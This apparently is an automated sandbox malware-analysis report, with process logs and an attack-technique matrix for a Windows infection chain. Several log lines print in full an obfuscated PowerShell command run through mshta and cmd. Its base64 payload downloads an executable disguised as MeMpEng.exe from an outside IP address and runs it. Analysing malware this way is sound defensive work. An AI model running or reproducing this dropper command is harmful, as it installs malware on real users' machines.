    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe" Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MeMpEng.exe "C:\Users\user\AppData\Roaming\MeMpEng.exe"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je9tqzgxicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagywrelxrzugugicagicagicagicagicagicagicagicagicagicaglw1ftwjfukrfrmlusvrpt04gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1vti5ktgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagihbgy1pjall6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicbzc1hlusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagzmnvelasdwludcagicagicagicagicagicagicagicagicagicagicbzsmdrset2leludfb0ciagicagicagicagicagicagicagicagicagicagicbvckipoycgicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicaginb1uwd1aeryuxkiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy0ugicagicagicagicagicagicagicagicagicagicagv3jkqwj0tvcgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakt1ndode6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumty2lzm0mc9nzu1wrw5nlmv4zsisiirlbly6qvbqrefuqvxnzu1wrw5nlmv4zsismcwwktttdefydc1tbgvfccgzkttzdefsvcagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxe1ltxbfbmcuzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040352F
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    OS Credential Dumping2
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    13
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts13
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts1
    Access Token Manipulation
    21
    Obfuscated Files or Information
    LSASS Memory116
    System Information Discovery
    Remote Desktop Protocol1
    Email Collection
    11
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts111
    Command and Scripting Interpreter
    Logon Script (Windows)11
    Process Injection
    1
    Install Root Certificate
    Security Account Manager1
    Security Software Discovery
    SMB/Windows Admin Shares2
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts3
    PowerShell
    Login HookLogin Hook1
    DLL Side-Loading
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput Capture23
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Masquerading
    LSA Secrets21
    Virtualization/Sandbox Evasion
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
    Virtualization/Sandbox Evasion
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Access Token Manipulation
    DCSync1
    Remote System Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
    Process Injection
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
